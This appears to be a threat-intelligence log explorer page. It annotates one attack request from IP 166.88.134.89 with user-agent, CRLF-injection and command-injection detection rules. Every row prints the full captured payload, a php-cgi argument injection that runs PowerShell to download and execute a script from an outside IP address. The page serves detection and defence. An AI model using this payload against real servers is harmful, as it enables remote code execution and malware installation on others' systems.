DigitalOcean Referral Badge
cloud1
cloud2
cloud3
cloud4
cloud5
cloud6
← Back to IP report

Log Explorer

Fact drill-down for 166.88.134.89
Risk 3 LOW Scope All time All-time facts 6 In-scope 6 Filtered 6 Seen 2025-01-062025-01-06
Reset (all-time)
Active (none) Clear
Faceted filters (facts-based) exact core + snapshot + optional start/end
Annotation facets
HTTP facets
Snapshot facets
Custom time window (optional override)
Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.
Tip: keep windows tight when you need speed, but the default is fact-complete.
Top annotators (facts, in-scope)
cmdi 2 hdrinj 2 base 1 ua 1
Top labels (facts, in-scope)
cmdi 2 hdrinj 2 observed 1 ua 1
Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 1 — total 6 rows
#1 2025-01-06 01:40:59 event 2230386 GET 301 bytes 169
ann ua 10 label ua
Request HTTP library/automation runtime user-agent
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%…
referer
-
UA
Go-http-client/1.1
Annotation facts
label
ua
rule
ua:library_client
conf
72.00
details
UA indicates a low-level HTTP client library or automation runtime.
More (full fields + snapshot) expand
url
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?>
referer
-
UA
Go-http-client/1.1
summary
HTTP library/automation runtime user-agent
details
UA indicates a low-level HTTP client library or automation runtime.
subnet
166.88.134.0/24
asn
149440 — Evoxt Enterprise
geo
United Kingdom, England, City of London
org
Evoxt
#2 2025-01-06 01:40:59 event 2230386 GET 301 bytes 169
ann hdrinj 24 label hdrinj
Request Encoded newline detected (%0d/%0a)
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%…
referer
-
UA
Go-http-client/1.1
Annotation facts
label
hdrinj
rule
hdrinj:encoded_newline
conf
90.00
details
Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.
More (full fields + snapshot) expand
url
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?>
referer
-
UA
Go-http-client/1.1
summary
Encoded newline detected (%0d/%0a)
details
Percent-encoded CR/LF sequences are a common indicator of CRLF injection / response splitting attempts.
subnet
166.88.134.0/24
asn
149440 — Evoxt Enterprise
geo
United Kingdom, England, City of London
org
Evoxt
#3 2025-01-06 01:40:59 event 2230386 GET 301 bytes 169
ann hdrinj 28 label hdrinj
Request Header overflow / response splitting indicator
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%…
referer
-
UA
Go-http-client/1.1
Annotation facts
label
hdrinj
rule
hdrinj:header_overflow
conf
93.00
details
Multiple CRLF/newline sequences suggest an attempt to terminate headers and inject a secondary response or headers.
More (full fields + snapshot) expand
url
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?>
referer
-
UA
Go-http-client/1.1
summary
Header overflow / response splitting indicator
details
Multiple CRLF/newline sequences suggest an attempt to terminate headers and inject a secondary response or headers.
subnet
166.88.134.0/24
asn
149440 — Evoxt Enterprise
geo
United Kingdom, England, City of London
org
Evoxt
#4 2025-01-06 01:40:59 event 2230386 GET 301 bytes 169
ann base label observed
Request event observed
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%…
referer
-
UA
Go-http-client/1.1
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?>
referer
-
UA
Go-http-client/1.1
summary
event observed
details
subnet
166.88.134.0/24
asn
149440 — Evoxt Enterprise
geo
United Kingdom, England, City of London
org
Evoxt
#5 2025-01-06 01:40:59 event 2230386 GET 301 bytes 169
ann cmdi 22 label cmdi
Request Command/file-injection indicator: cmdi:pipe_or_redirect
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%…
referer
-
UA
Go-http-client/1.1
Annotation facts
label
cmdi
rule
cmdi:pipe_or_redirect
conf
75.00
details
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /cgi-bin/php-cgi.exe?arg= Content-Type: text/plain <?php system('powers'
More (full fields + snapshot) expand
url
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?>
referer
-
UA
Go-http-client/1.1
summary
Command/file-injection indicator: cmdi:pipe_or_redirect
details
Pipe/redirect operators in a context that resembles command execution. Snippet='GET /cgi-bin/php-cgi.exe?arg= Content-Type: text/plain <?php system('powers'
subnet
166.88.134.0/24
asn
149440 — Evoxt Enterprise
geo
United Kingdom, England, City of London
org
Evoxt
#6 2025-01-06 01:40:59 event 2230386 GET 301 bytes 169
ann cmdi 28 label cmdi
Request Command/file-injection indicator: cmdi:op_plus_cmd
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%…
referer
-
UA
Go-http-client/1.1
Annotation facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/php-cgi.exe?arg= Content-Type: text/plain <?php system('powers'
More (full fields + snapshot) expand
url
/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('powershell.exe%20-Command%20%22%26%20%7Biwr%20-Uri%20http%3A%2F%2F23.27.51.244%2Fscript.ps1%20-OutFile%20script.ps1%3B%20.%2Fscript.ps1%7D%22');?>
referer
-
UA
Go-http-client/1.1
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/php-cgi.exe?arg= Content-Type: text/plain <?php system('powers'
subnet
166.88.134.0/24
asn
149440 — Evoxt Enterprise
geo
United Kingdom, England, City of London
org
Evoxt
Page 1 of 1